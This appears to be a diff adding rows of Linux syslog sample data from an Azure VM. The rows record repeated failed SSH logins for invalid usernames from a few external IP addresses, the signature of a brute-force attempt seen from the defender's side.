+18285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:05,UbuntuDevEnv,2019-06-26 09:47:05,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoopuser 187.6.249.142 port 54010 [preauth],75581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoopuser,187.6.249.1,54010,,
+18286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:05,UbuntuDevEnv,2019-06-26 09:47:05,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 54010:11: Bye Bye [preauth],75581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,54010,,
+18287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:38,UbuntuDevEnv,2019-06-26 09:47:38,auth,UbuntuDevEnv,info,Invalid user ftptest from 115.159.216.187 port 37098,75700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,115.159.216.1,37098,,
+18288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:38,UbuntuDevEnv,2019-06-26 09:47:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:38,UbuntuDevEnv,2019-06-26 09:47:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,75700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:40,UbuntuDevEnv,2019-06-26 09:47:39,auth,UbuntuDevEnv,info,Failed password for invalid user ftptest from 115.159.216.187 port 37098 ssh2,75700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,115.159.216.1,37098,,
+18291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:40,UbuntuDevEnv,2019-06-26 09:47:39,auth,UbuntuDevEnv,info,Disconnected from invalid user ftptest 115.159.216.187 port 37098 [preauth],75700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,115.159.216.1,37098,,
+18292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:40,UbuntuDevEnv,2019-06-26 09:47:39,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 37098:11: Bye Bye [preauth],75700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,37098,,
+18293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:43,UbuntuDevEnv,2019-06-26 09:47:42,auth,UbuntuDevEnv,info,Invalid user fy from 176.31.202.90 port 56370,75730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,176.31.202.9,56370,,
+18294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:43,UbuntuDevEnv,2019-06-26 09:47:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,75730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:43,UbuntuDevEnv,2019-06-26 09:47:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:45,UbuntuDevEnv,2019-06-26 09:47:45,auth,UbuntuDevEnv,info,Failed password for invalid user fy from 176.31.202.90 port 56370 ssh2,75730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,176.31.202.9,56370,,
+18297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:45,UbuntuDevEnv,2019-06-26 09:47:45,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 56370:11: Bye Bye [preauth],75730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,56370,,
+18298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:47:45,UbuntuDevEnv,2019-06-26 09:47:45,auth,UbuntuDevEnv,info,Disconnected from invalid user fy 176.31.202.90 port 56370 [preauth],75730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fy,176.31.202.9,56370,,
+18299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:48:55,UbuntuDevEnv,2019-06-26 09:48:54,auth,UbuntuDevEnv,info,Invalid user lottis from 187.6.249.142 port 42684,75972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lottis,187.6.249.1,42684,,
+18300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:48:55,UbuntuDevEnv,2019-06-26 09:48:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,75972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:48:55,UbuntuDevEnv,2019-06-26 09:48:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,75972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:48:57,UbuntuDevEnv,2019-06-26 09:48:57,auth,UbuntuDevEnv,info,Failed password for invalid user lottis from 187.6.249.142 port 42684 ssh2,75972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lottis,187.6.249.1,42684,,
+18303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:48:57,UbuntuDevEnv,2019-06-26 09:48:57,auth,UbuntuDevEnv,info,Disconnected from invalid user lottis 187.6.249.142 port 42684 [preauth],75972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lottis,187.6.249.1,42684,,
+18304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:48:57,UbuntuDevEnv,2019-06-26 09:48:57,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 42684:11: Bye Bye [preauth],75972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,42684,,
+18305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:49:28,UbuntuDevEnv,2019-06-26 09:49:27,auth,UbuntuDevEnv,info,Invalid user dale from 115.159.216.187 port 45171,76089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dale,115.159.216.1,45171,,
+18306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:49:28,UbuntuDevEnv,2019-06-26 09:49:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,76089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:49:28,UbuntuDevEnv,2019-06-26 09:49:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:49:30,UbuntuDevEnv,2019-06-26 09:49:29,auth,UbuntuDevEnv,info,Failed password for invalid user dale from 115.159.216.187 port 45171 ssh2,76089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dale,115.159.216.1,45171,,
+18309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:49:30,UbuntuDevEnv,2019-06-26 09:49:30,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 45171:11: Bye Bye [preauth],76089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,45171,,
+18310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:49:30,UbuntuDevEnv,2019-06-26 09:49:30,auth,UbuntuDevEnv,info,Disconnected from invalid user dale 115.159.216.187 port 45171 [preauth],76089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dale,115.159.216.1,45171,,
+18311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:50:46,UbuntuDevEnv,2019-06-26 09:50:46,auth,UbuntuDevEnv,info,Invalid user admin from 187.6.249.142 port 59608,76459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,187.6.249.1,59608,,
+18312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:50:46,UbuntuDevEnv,2019-06-26 09:50:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:50:46,UbuntuDevEnv,2019-06-26 09:50:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,76459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:50:48,UbuntuDevEnv,2019-06-26 09:50:47,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 187.6.249.142 port 59608 ssh2,76459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,187.6.249.1,59608,,
+18315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:50:48,UbuntuDevEnv,2019-06-26 09:50:48,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 59608:11: Bye Bye [preauth],76459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,59608,,
+18316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:50:48,UbuntuDevEnv,2019-06-26 09:50:48,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 187.6.249.142 port 59608 [preauth],76459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,187.6.249.1,59608,,
+18317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:51:21,UbuntuDevEnv,2019-06-26 09:51:21,auth,UbuntuDevEnv,info,Invalid user philippe from 115.159.216.187 port 53288,76575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,philippe,115.159.216.1,53288,,
+18318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:51:21,UbuntuDevEnv,2019-06-26 09:51:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,76575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:51:21,UbuntuDevEnv,2019-06-26 09:51:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:51:22,UbuntuDevEnv,2019-06-26 09:51:22,auth,UbuntuDevEnv,info,Failed password for invalid user philippe from 115.159.216.187 port 53288 ssh2,76575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,philippe,115.159.216.1,53288,,
+18321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:51:23,UbuntuDevEnv,2019-06-26 09:51:22,auth,UbuntuDevEnv,info,Disconnected from invalid user philippe 115.159.216.187 port 53288 [preauth],76575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,philippe,115.159.216.1,53288,,
+18322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:51:23,UbuntuDevEnv,2019-06-26 09:51:22,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 53288:11: Bye Bye [preauth],76575,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,53288,,
+18323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:52:35,UbuntuDevEnv,2019-06-26 09:52:34,auth,UbuntuDevEnv,info,Invalid user etherpad-lite from 187.6.249.142 port 48278,76832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etherpad,187.6.249.1,48278,,
+18324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:52:35,UbuntuDevEnv,2019-06-26 09:52:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:52:35,UbuntuDevEnv,2019-06-26 09:52:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,76832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:52:36,UbuntuDevEnv,2019-06-26 09:52:36,auth,UbuntuDevEnv,info,Failed password for invalid user etherpad-lite from 187.6.249.142 port 48278 ssh2,76832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etherpad,187.6.249.1,48278,,
+18327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:52:37,UbuntuDevEnv,2019-06-26 09:52:36,auth,UbuntuDevEnv,info,Disconnected from invalid user etherpad-lite 187.6.249.142 port 48278 [preauth],76832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,etherpad,187.6.249.1,48278,,
+18328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:52:37,UbuntuDevEnv,2019-06-26 09:52:36,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 48278:11: Bye Bye [preauth],76832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,48278,,
+18329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:53:09,UbuntuDevEnv,2019-06-26 09:53:09,auth,UbuntuDevEnv,info,Invalid user staffa from 115.159.216.187 port 33069,76952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,staffa,115.159.216.1,33069,,
+18330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:53:09,UbuntuDevEnv,2019-06-26 09:53:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,76952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:53:09,UbuntuDevEnv,2019-06-26 09:53:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,76952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:53:11,UbuntuDevEnv,2019-06-26 09:53:11,auth,UbuntuDevEnv,info,Failed password for invalid user staffa from 115.159.216.187 port 33069 ssh2,76952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,staffa,115.159.216.1,33069,,
+18333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:53:12,UbuntuDevEnv,2019-06-26 09:53:11,auth,UbuntuDevEnv,info,Disconnected from invalid user staffa 115.159.216.187 port 33069 [preauth],76952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,staffa,115.159.216.1,33069,,
+18334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:53:12,UbuntuDevEnv,2019-06-26 09:53:11,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 33069:11: Bye Bye [preauth],76952,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,33069,,
+18335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:54:28,UbuntuDevEnv,2019-06-26 09:54:28,auth,UbuntuDevEnv,info,Invalid user fei from 187.6.249.142 port 37092,77231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fei,187.6.249.1,37092,,
+18336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:54:28,UbuntuDevEnv,2019-06-26 09:54:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:54:28,UbuntuDevEnv,2019-06-26 09:54:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,77231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:54:30,UbuntuDevEnv,2019-06-26 09:54:29,auth,UbuntuDevEnv,info,Failed password for invalid user fei from 187.6.249.142 port 37092 ssh2,77231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fei,187.6.249.1,37092,,
+18339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:54:30,UbuntuDevEnv,2019-06-26 09:54:30,auth,UbuntuDevEnv,info,Disconnected from invalid user fei 187.6.249.142 port 37092 [preauth],77231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fei,187.6.249.1,37092,,
+18340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:54:30,UbuntuDevEnv,2019-06-26 09:54:30,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 37092:11: Bye Bye [preauth],77231,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,37092,,
+18341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:55:05,UbuntuDevEnv,2019-06-26 09:55:05,auth,UbuntuDevEnv,info,Connection closed by 115.159.216.187 port 41093 [preauth],77347,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,41093,,
+18342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:56:22,UbuntuDevEnv,2019-06-26 09:56:21,auth,UbuntuDevEnv,info,Invalid user imperial from 187.6.249.142 port 53990,77639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,imperial,187.6.249.1,53990,,
+18343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:56:22,UbuntuDevEnv,2019-06-26 09:56:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:56:22,UbuntuDevEnv,2019-06-26 09:56:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,77639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
